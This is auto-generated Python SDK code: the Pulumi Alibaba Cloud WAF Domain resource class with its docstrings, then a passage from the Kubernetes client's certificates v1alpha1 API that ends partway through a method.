pulumi.log.warn("""domain is deprecated: Field 'domain' has been deprecated from version 1.94.0. Use 'domain_name' instead.""")
if domain is not None:
pulumi.set(__self__, "domain", domain)
if domain_name is not None:
pulumi.set(__self__, "domain_name", domain_name)
if http2_ports is not None:
pulumi.set(__self__, "http2_ports", http2_ports)
if http_ports is not None:
pulumi.set(__self__, "http_ports", http_ports)
if http_to_user_ip is not None:
pulumi.set(__self__, "http_to_user_ip", http_to_user_ip)
if https_ports is not None:
pulumi.set(__self__, "https_ports", https_ports)
if https_redirect is not None:
pulumi.set(__self__, "https_redirect", https_redirect)
if instance_id is not None:
pulumi.set(__self__, "instance_id", instance_id)
if is_access_product is not None:
pulumi.set(__self__, "is_access_product", is_access_product)
if load_balancing is not None:
pulumi.set(__self__, "load_balancing", load_balancing)
if log_headers is not None:
pulumi.set(__self__, "log_headers", log_headers)
if read_time is not None:
pulumi.set(__self__, "read_time", read_time)
if resource_group_id is not None:
pulumi.set(__self__, "resource_group_id", resource_group_id)
if source_ips is not None:
pulumi.set(__self__, "source_ips", source_ips)
if write_time is not None:
pulumi.set(__self__, "write_time", write_time)
@property
@pulumi.getter(name="clusterType")
def cluster_type(self) -> Optional[pulumi.Input[str]]:
"""
The type of the WAF cluster. Valid values: `PhysicalCluster` and `VirtualCluster`. Default to `PhysicalCluster`.
"""
return pulumi.get(self, "cluster_type")
@cluster_type.setter
def cluster_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cluster_type", value)
@property
@pulumi.getter
def cname(self) -> Optional[pulumi.Input[str]]:
"""
The CNAME record assigned by the WAF instance to the specified domain.
"""
return pulumi.get(self, "cname")
@cname.setter
def cname(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cname", value)
@property
@pulumi.getter(name="connectionTime")
def connection_time(self) -> Optional[pulumi.Input[int]]:
"""
The connection timeout for WAF exclusive clusters. Unit: seconds.
"""
return pulumi.get(self, "connection_time")
@connection_time.setter
def connection_time(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "connection_time", value)
@property
@pulumi.getter
def domain(self) -> Optional[pulumi.Input[str]]:
"""
Field `domain` has been deprecated from version 1.94.0. Use `domain_name` instead.
"""
return pulumi.get(self, "domain")
@domain.setter
def domain(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "domain", value)
@property
@pulumi.getter(name="domainName")
def domain_name(self) -> Optional[pulumi.Input[str]]:
"""
The domain that you want to add to WAF.
"""
return pulumi.get(self, "domain_name")
@domain_name.setter
def domain_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "domain_name", value)
@property
@pulumi.getter(name="http2Ports")
def http2_ports(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
List of the HTTP 2.0 ports.
"""
return pulumi.get(self, "http2_ports")
@http2_ports.setter
def http2_ports(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "http2_ports", value)
@property
@pulumi.getter(name="httpPorts")
def http_ports(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
List of the HTTP ports.
"""
return pulumi.get(self, "http_ports")
@http_ports.setter
def http_ports(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "http_ports", value)
@property
@pulumi.getter(name="httpToUserIp")
def http_to_user_ip(self) -> Optional[pulumi.Input[str]]:
"""
Specifies whether to enable the HTTP back-to-origin feature. After this feature is enabled, the WAF instance can use HTTP to forward HTTPS requests to the origin server.
By default, port 80 is used to forward the requests to the origin server. Valid values: `On` and `Off`. Default to `Off`.
"""
return pulumi.get(self, "http_to_user_ip")
@http_to_user_ip.setter
def http_to_user_ip(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "http_to_user_ip", value)
@property
@pulumi.getter(name="httpsPorts")
def https_ports(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
List of the HTTPS ports.
"""
return pulumi.get(self, "https_ports")
@https_ports.setter
def https_ports(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "https_ports", value)
@property
@pulumi.getter(name="httpsRedirect")
def https_redirect(self) -> Optional[pulumi.Input[str]]:
"""
Specifies whether to redirect HTTP requests as HTTPS requests. Valid values: "On" and `Off`. Default to `Off`.
"""
return pulumi.get(self, "https_redirect")
@https_redirect.setter
def https_redirect(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "https_redirect", value)
@property
@pulumi.getter(name="instanceId")
def instance_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the WAF instance.
"""
return pulumi.get(self, "instance_id")
@instance_id.setter
def instance_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "instance_id", value)
@property
@pulumi.getter(name="isAccessProduct")
def is_access_product(self) -> Optional[pulumi.Input[str]]:
"""
Specifies whether to configure a Layer-7 proxy, such as Anti-DDoS Pro or CDN, to filter the inbound traffic before it is forwarded to WAF. Valid values: `On` and `Off`. Default to `Off`.
"""
return pulumi.get(self, "is_access_product")
@is_access_product.setter
def is_access_product(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "is_access_product", value)
@property
@pulumi.getter(name="loadBalancing")
def load_balancing(self) -> Optional[pulumi.Input[str]]:
"""
The load balancing algorithm that is used to forward requests to the origin. Valid values: `IpHash` and `RoundRobin`. Default to `IpHash`.
"""
return pulumi.get(self, "load_balancing")
@load_balancing.setter
def load_balancing(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "load_balancing", value)
@property
@pulumi.getter(name="logHeaders")
def log_headers(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['DomainLogHeaderArgs']]]]:
"""
The key-value pair that is used to mark the traffic that flows through WAF to the domain. Each item contains two field:
* key: The key of label
* value: The value of label
"""
return pulumi.get(self, "log_headers")
@log_headers.setter
def log_headers(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['DomainLogHeaderArgs']]]]):
pulumi.set(self, "log_headers", value)
@property
@pulumi.getter(name="readTime")
def read_time(self) -> Optional[pulumi.Input[int]]:
"""
The read timeout of a WAF exclusive cluster. Unit: seconds.
"""
return pulumi.get(self, "read_time")
@read_time.setter
def read_time(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "read_time", value)
@property
@pulumi.getter(name="resourceGroupId")
def resource_group_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the resource group to which the queried domain belongs in Resource Management. By default, no value is specified, indicating that the domain belongs to the default resource group.
"""
return pulumi.get(self, "resource_group_id")
@resource_group_id.setter
def resource_group_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_id", value)
@property
@pulumi.getter(name="sourceIps")
def source_ips(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
List of the IP address or domain of the origin server to which the specified domain points.
"""
return pulumi.get(self, "source_ips")
@source_ips.setter
def source_ips(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "source_ips", value)
@property
@pulumi.getter(name="writeTime")
def write_time(self) -> Optional[pulumi.Input[int]]:
"""
The timeout period for a WAF exclusive cluster write connection. Unit: seconds.
"""
return pulumi.get(self, "write_time")
@write_time.setter
def write_time(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "write_time", value)
class Domain(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
cluster_type: Optional[pulumi.Input[str]] = None,
connection_time: Optional[pulumi.Input[int]] = None,
domain: Optional[pulumi.Input[str]] = None,
domain_name: Optional[pulumi.Input[str]] = None,
http2_ports: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
http_ports: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
http_to_user_ip: Optional[pulumi.Input[str]] = None,
https_ports: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
https_redirect: Optional[pulumi.Input[str]] = None,
instance_id: Optional[pulumi.Input[str]] = None,
is_access_product: Optional[pulumi.Input[str]] = None,
load_balancing: Optional[pulumi.Input[str]] = None,
log_headers: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['DomainLogHeaderArgs']]]]] = None,
read_time: Optional[pulumi.Input[int]] = None,
resource_group_id: Optional[pulumi.Input[str]] = None,
source_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
write_time: Optional[pulumi.Input[int]] = None,
__props__=None):
"""
Provides a WAF Domain resource to create domain in the Web Application Firewall.
For information about WAF and how to use it, see [What is Alibaba Cloud WAF](https://www.alibabacloud.com/help/doc-detail/28517.htm).
> **NOTE:** Available in 1.82.0+ .
## Example Usage
```python
import pulumi
import pulumi_alicloud as alicloud
domain = alicloud.waf.Domain("domain",
cluster_type="PhysicalCluster",
domain="www.aliyun.com",
http2_ports=["443"],
http_ports=["80"],
http_to_user_ip="Off",
https_ports=["443"],
https_redirect="Off",
instance_id="waf-123455",
is_access_product="On",
load_balancing="IpHash",
log_headers=[alicloud.waf.DomainLogHeaderArgs(
key="foo",
value="http",
)],
source_ips=["1.1.1.1"])
```
## Import
WAF domain can be imported using the id, e.g.
```sh
$ pulumi import alicloud:waf/domain:Domain domain waf-132435:www.domain.com
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] cluster_type: The type of the WAF cluster. Valid values: `PhysicalCluster` and `VirtualCluster`. Default to `PhysicalCluster`.
:param pulumi.Input[int] connection_time: The connection timeout for WAF exclusive clusters. Unit: seconds.
:param pulumi.Input[str] domain: Field `domain` has been deprecated from version 1.94.0. Use `domain_name` instead.
:param pulumi.Input[str] domain_name: The domain that you want to add to WAF.
:param pulumi.Input[Sequence[pulumi.Input[str]]] http2_ports: List of the HTTP 2.0 ports.
:param pulumi.Input[Sequence[pulumi.Input[str]]] http_ports: List of the HTTP ports.
:param pulumi.Input[str] http_to_user_ip: Specifies whether to enable the HTTP back-to-origin feature. After this feature is enabled, the WAF instance can use HTTP to forward HTTPS requests to the origin server.
By default, port 80 is used to forward the requests to the origin server. Valid values: `On` and `Off`. Default to `Off`.
:param pulumi.Input[Sequence[pulumi.Input[str]]] https_ports: List of the HTTPS ports.
:param pulumi.Input[str] https_redirect: Specifies whether to redirect HTTP requests as HTTPS requests. Valid values: "On" and `Off`. Default to `Off`.
:param pulumi.Input[str] instance_id: The ID of the WAF instance.
:param pulumi.Input[str] is_access_product: Specifies whether to configure a Layer-7 proxy, such as Anti-DDoS Pro or CDN, to filter the inbound traffic before it is forwarded to WAF. Valid values: `On` and `Off`. Default to `Off`.
:param pulumi.Input[str] load_balancing: The load balancing algorithm that is used to forward requests to the origin. Valid values: `IpHash` and `RoundRobin`. Default to `IpHash`.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['DomainLogHeaderArgs']]]] log_headers: The key-value pair that is used to mark the traffic that flows through WAF to the domain. Each item contains two field:
* key: The key of label
* value: The value of label
:param pulumi.Input[int] read_time: The read timeout of a WAF exclusive cluster. Unit: seconds.
:param pulumi.Input[str] resource_group_id: The ID of the resource group to which the queried domain belongs in Resource Management. By default, no value is specified, indicating that the domain belongs to the default resource group.
:param pulumi.Input[Sequence[pulumi.Input[str]]] source_ips: List of the IP address or domain of the origin server to which the specified domain points.
:param pulumi.Input[int] write_time: The timeout period for a WAF exclusive cluster write connection. Unit: seconds.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: DomainArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides a WAF Domain resource to create domain in the Web Application Firewall.
For information about WAF and how to use it, see [What is Alibaba Cloud WAF](https://www.alibabacloud.com/help/doc-detail/28517.htm).
> **NOTE:** Available in 1.82.0+ .
## Example Usage
```python
import pulumi
import pulumi_alicloud as alicloud
domain = alicloud.waf.Domain("domain",
cluster_type="PhysicalCluster",
domain="www.aliyun.com",
http2_ports=["443"],
http_ports=["80"],
http_to_user_ip="Off",
https_ports=["443"],
https_redirect="Off",
instance_id="waf-123455",
is_access_product="On",
load_balancing="IpHash",
log_headers=[alicloud.waf.DomainLogHeaderArgs(
key="foo",
value="http",
)],
source_ips=["1.1.1.1"])
```
## Import
WAF domain can be imported using the id, e.g.
```sh
$ pulumi import alicloud:waf/domain:Domain domain waf-132435:www.domain.com
```
:param str resource_name: The name of the resource.
:param DomainArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(DomainArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
cluster_type: Optional[pulumi.Input[str]] = None,
connection_time: Optional[pulumi.Input[int]] = None,
domain: Optional[pulumi.Input[str]] = None,
domain_name: Optional[pulumi.Input[str]] = None,
http2_ports: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
http_ports: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
http_to_user_ip: Optional[pulumi.Input[str]] = None,
https_ports: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
https_redirect: Optional[pulumi.Input[str]] = None,
instance_id: Optional[pulumi.Input[str]] = None,
is_access_product: Optional[pulumi.Input[str]] = None,
load_balancing: Optional[pulumi.Input[str]] = None,
log_headers: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['DomainLogHeaderArgs']]]]] = None,
read_time: Optional[pulumi.Input[int]] = None,
resource_group_id: Optional[pulumi.Input[str]] = None,
source_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
write_time: Optional[pulumi.Input[int]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = DomainArgs.__new__(DomainArgs)
__props__.__dict__["cluster_type"] = cluster_type
__props__.__dict__["connection_time"] = connection_time
if domain is not None and not opts.urn:
warnings.warn("""Field 'domain' has been deprecated from version 1.94.0. Use 'domain_name' instead.""", DeprecationWarning)
pulumi.log.warn("""domain is deprecated: Field 'domain' has been deprecated from version 1.94.0. Use 'domain_name' instead.""")
__props__.__dict__["domain"] = domain
__props__.__dict__["domain_name"] = domain_name
__props__.__dict__["http2_ports"] = http2_ports
__props__.__dict__["http_ports"] = http_ports
__props__.__dict__["http_to_user_ip"] = http_to_user_ip
__props__.__dict__["https_ports"] = https_ports
__props__.__dict__["https_redirect"] = https_redirect
if instance_id is None and not opts.urn:
raise TypeError("Missing required property 'instance_id'")
__props__.__dict__["instance_id"] = instance_id
if is_access_product is None and not opts.urn:
raise TypeError("Missing required property 'is_access_product'")
__props__.__dict__["is_access_product"] = is_access_product
__props__.__dict__["load_balancing"] = load_balancing
__props__.__dict__["log_headers"] = log_headers
__props__.__dict__["read_time"] = read_time
__props__.__dict__["resource_group_id"] = resource_group_id
__props__.__dict__["source_ips"] = source_ips
__props__.__dict__["write_time"] = write_time
__props__.__dict__["cname"] = None
super(Domain, __self__).__init__(
'alicloud:waf/domain:Domain',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
cluster_type: Optional[pulumi.Input[str]] = None,
cname: Optional[pulumi.Input[str]] = None,
connection_time: Optional[pulumi.Input[int]] = None,
domain: Optional[pulumi.Input[str]] = None,
domain_name: Optional[pulumi.Input[str]] = None,
http2_ports: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
http_ports: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
http_to_user_ip: Optional[pulumi.Input[str]] = None,
https_ports: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
https_redirect: Optional[pulumi.Input[str]] = None,
instance_id: Optional[pulumi.Input[str]] = None,
is_access_product: Optional[pulumi.Input[str]] = None,
load_balancing: Optional[pulumi.Input[str]] = None,
log_headers: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['DomainLogHeaderArgs']]]]] = None,
read_time: Optional[pulumi.Input[int]] = None,
resource_group_id: Optional[pulumi.Input[str]] = None,
source_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
write_time: Optional[pulumi.Input[int]] = None) -> 'Domain':
"""
Get an existing Domain resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] cluster_type: The type of the WAF cluster. Valid values: `PhysicalCluster` and `VirtualCluster`. Default to `PhysicalCluster`.
:param pulumi.Input[str] cname: The CNAME record assigned by the WAF instance to the specified domain.
:param pulumi.Input[int] connection_time: The connection timeout for WAF exclusive clusters. Unit: seconds.
:param pulumi.Input[str] domain: Field `domain` has been deprecated from version 1.94.0. Use `domain_name` instead.
:param pulumi.Input[str] domain_name: The domain that you want to add to WAF.
:param pulumi.Input[Sequence[pulumi.Input[str]]] http2_ports: List of the HTTP 2.0 ports.
:param pulumi.Input[Sequence[pulumi.Input[str]]] http_ports: List of the HTTP ports.
:param pulumi.Input[str] http_to_user_ip: Specifies whether to enable the HTTP back-to-origin feature. After this feature is enabled, the WAF instance can use HTTP to forward HTTPS requests to the origin server.
By default, port 80 is used to forward the requests to the origin server. Valid values: `On` and `Off`. Default to `Off`.
:param pulumi.Input[Sequence[pulumi.Input[str]]] https_ports: List of the HTTPS ports.
:param pulumi.Input[str] https_redirect: Specifies whether to redirect HTTP requests as HTTPS requests. Valid values: "On" and `Off`. Default to `Off`.
:param pulumi.Input[str] instance_id: The ID of the WAF instance.
:param pulumi.Input[str] is_access_product: Specifies whether to configure a Layer-7 proxy, such as Anti-DDoS Pro or CDN, to filter the inbound traffic before it is forwarded to WAF. Valid values: `On` and `Off`. Default to `Off`.
:param pulumi.Input[str] load_balancing: The load balancing algorithm that is used to forward requests to the origin. Valid values: `IpHash` and `RoundRobin`. Default to `IpHash`.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['DomainLogHeaderArgs']]]] log_headers: The key-value pair that is used to mark the traffic that flows through WAF to the domain. Each item contains two field:
* key: The key of label
* value: The value of label
:param pulumi.Input[int] read_time: The read timeout of a WAF exclusive cluster. Unit: seconds.
:param pulumi.Input[str] resource_group_id: The ID of the resource group to which the queried domain belongs in Resource Management. By default, no value is specified, indicating that the domain belongs to the default resource group.
:param pulumi.Input[Sequence[pulumi.Input[str]]] source_ips: List of the IP address or domain of the origin server to which the specified domain points.
:param pulumi.Input[int] write_time: The timeout period for a WAF exclusive cluster write connection. Unit: seconds.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _DomainState.__new__(_DomainState)
__props__.__dict__["cluster_type"] = cluster_type
__props__.__dict__["cname"] = cname
__props__.__dict__["connection_time"] = connection_time
__props__.__dict__["domain"] = domain
__props__.__dict__["domain_name"] = domain_name
__props__.__dict__["http2_ports"] = http2_ports
__props__.__dict__["http_ports"] = http_ports
__props__.__dict__["http_to_user_ip"] = http_to_user_ip
__props__.__dict__["https_ports"] = https_ports
__props__.__dict__["https_redirect"] = https_redirect
__props__.__dict__["instance_id"] = instance_id
__props__.__dict__["is_access_product"] = is_access_product
__props__.__dict__["load_balancing"] = load_balancing
__props__.__dict__["log_headers"] = log_headers
__props__.__dict__["read_time"] = read_time
__props__.__dict__["resource_group_id"] = resource_group_id
__props__.__dict__["source_ips"] = source_ips
__props__.__dict__["write_time"] = write_time
return Domain(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="clusterType")
def cluster_type(self) -> pulumi.Output[Optional[str]]:
"""
The type of the WAF cluster. Valid values: `PhysicalCluster` and `VirtualCluster`. Default to `PhysicalCluster`.
"""
return pulumi.get(self, "cluster_type")
@property
@pulumi.getter
def cname(self) -> pulumi.Output[str]:
"""
The CNAME record assigned by the WAF instance to the specified domain.
"""
return pulumi.get(self, "cname")
@property
@pulumi.getter(name="connectionTime")
def connection_time(self) -> pulumi.Output[Optional[int]]:
"""
The connection timeout for WAF exclusive clusters. Unit: seconds.
"""
return pulumi.get(self, "connection_time")
@property
@pulumi.getter
def domain(self) -> pulumi.Output[str]:
"""
Field `domain` has been deprecated from version 1.94.0. Use `domain_name` instead.
"""
return pulumi.get(self, "domain")
@property
@pulumi.getter(name="domainName")
def domain_name(self) -> pulumi.Output[str]:
"""
The domain that you want to add to WAF.
"""
return pulumi.get(self, "domain_name")
@property
@pulumi.getter(name="http2Ports")
def http2_ports(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
List of the HTTP 2.0 ports.
"""
return pulumi.get(self, "http2_ports")
@property
@pulumi.getter(name="httpPorts")
def http_ports(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
List of the HTTP ports.
"""
return pulumi.get(self, "http_ports")
@property
@pulumi.getter(name="httpToUserIp")
def http_to_user_ip(self) -> pulumi.Output[Optional[str]]:
"""
Specifies whether to enable the HTTP back-to-origin feature. After this feature is enabled, the WAF instance can use HTTP to forward HTTPS requests to the origin server.
By default, port 80 is used to forward the requests to the origin server. Valid values: `On` and `Off`. Default to `Off`.
"""
return pulumi.get(self, "http_to_user_ip")
@property
@pulumi.getter(name="httpsPorts")
def https_ports(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
List of the HTTPS ports.
"""
return pulumi.get(self, "https_ports")
@property
@pulumi.getter(name="httpsRedirect")
def https_redirect(self) -> pulumi.Output[Optional[str]]:
"""
Specifies whether to redirect HTTP requests as HTTPS requests. Valid values: "On" and `Off`. Default to `Off`.
"""
return pulumi.get(self, "https_redirect")
@property
@pulumi.getter(name="instanceId")
def instance_id(self) -> pulumi.Output[str]:
"""
The ID of the WAF instance.
"""
return pulumi.get(self, "instance_id")
@property
@pulumi.getter(name="isAccessProduct")
def is_access_product(self) -> pulumi.Output[str]:
"""
Specifies whether to configure a Layer-7 proxy, such as Anti-DDoS Pro or CDN, to filter the inbound traffic before it is forwarded to WAF. Valid values: `On` and `Off`. Default to `Off`.
"""
return pulumi.get(self, "is_access_product")
@property
@pulumi.getter(name="loadBalancing")
def load_balancing(self) -> pulumi.Output[Optional[str]]:
"""
The load balancing algorithm that is used to forward requests to the origin. Valid values: `IpHash` and `RoundRobin`. Default to `IpHash`.
"""
return pulumi.get(self, "load_balancing")
@property
@pulumi.getter(name="logHeaders")
def log_headers(self) -> pulumi.Output[Optional[Sequence['outputs.DomainLogHeader']]]:
"""
The key-value pair that is used to mark the traffic that flows through WAF to the domain. Each item contains two field:
* key: The key of label
* value: The value of label
"""
return pulumi.get(self, "log_headers")
@property
@pulumi.getter(name="readTime")
def read_time(self) -> pulumi.Output[Optional[int]]:
"""
The read timeout of a WAF exclusive cluster. Unit: seconds.
"""
return pulumi.get(self, "read_time")
@property
@pulumi.getter(name="resourceGroupId")
def resource_group_id(self) -> pulumi.Output[str]:
"""
The ID of the resource group to which the queried domain belongs in Resource Management. By default, no value is specified, indicating that the domain belongs to the default resource group.
"""
return pulumi.get(self, "resource_group_id")
@property
@pulumi.getter(name="sourceIps")
def source_ips(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
List of the IP address or domain of the origin server to which the specified domain points.
"""
return pulumi.get(self, "source_ips")
@property
@pulumi.getter(name="writeTime")
def write_time(self) -> pulumi.Output[Optional[int]]:
"""
The timeout period for a WAF exclusive cluster write connection. Unit: seconds.
"""
return pulumi.get(self, "write_time")
| 49.381044 | 241 | 0.654367 | 6,527 | 51,060 | 4.929064 | 0.043665 | 0.101206 | 0.077024 | 0.054022 | 0.949801 | 0.94231 | 0.933949 | 0.927794 | 0.921485 | 0.895468 | 0 | 0.004883 | 0.237995 | 51,060 | 1,033 | 242 | 49.428848 | 0.82199 | 0.36416 | 0 | 0.853448 | 1 | 0.010345 | 0.115161 | 0.00164 | 0 | 0 | 0 | 0 | 0 | 1 | 0.163793 | false | 0.001724 | 0.012069 | 0 | 0.274138 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
0346c30fbb221b2f9b7a2ee332322b5b53dae99a | 70,260 | py | Python | k8sclient/apis/certificates_v1alpha1_api.py | Arvinhub/client-python | d67df30f635231d68dc4c20b9b7e234c616c1e6a | [
"Apache-2.0"
] | 1 | 2021-06-16T02:57:18.000Z | 2021-06-16T02:57:18.000Z | k8sclient/apis/certificates_v1alpha1_api.py | Arvinhub/client-python | d67df30f635231d68dc4c20b9b7e234c616c1e6a | [
"Apache-2.0"
] | null | null | null | k8sclient/apis/certificates_v1alpha1_api.py | Arvinhub/client-python | d67df30f635231d68dc4c20b9b7e234c616c1e6a | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: unversioned
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class CertificatesV1alpha1Api(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def create_certificates_v1alpha1_certificate_signing_request(self, body, **kwargs):
"""
create a CertificateSigningRequest
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_certificates_v1alpha1_certificate_signing_request(body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param V1alpha1CertificateSigningRequest body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1alpha1CertificateSigningRequest
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.create_certificates_v1alpha1_certificate_signing_request_with_http_info(body, **kwargs)
else:
(data) = self.create_certificates_v1alpha1_certificate_signing_request_with_http_info(body, **kwargs)
return data
def create_certificates_v1alpha1_certificate_signing_request_with_http_info(self, body, **kwargs):
"""
create a CertificateSigningRequest
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_certificates_v1alpha1_certificate_signing_request_with_http_info(body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param V1alpha1CertificateSigningRequest body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1alpha1CertificateSigningRequest
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'pretty']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_certificates_v1alpha1_certificate_signing_request" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `create_certificates_v1alpha1_certificate_signing_request`")
collection_formats = {}
resource_path = '/apis/certificates.k8s.io/v1alpha1/certificatesigningrequests'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1alpha1CertificateSigningRequest',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def delete_certificates_v1alpha1_certificate_signing_request(self, name, body, **kwargs):
"""
delete a CertificateSigningRequest
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_certificates_v1alpha1_certificate_signing_request(name, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the CertificateSigningRequest (required)
:param V1DeleteOptions body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: UnversionedStatus
If the method is called asynchronously,
returns the request thread.
"""
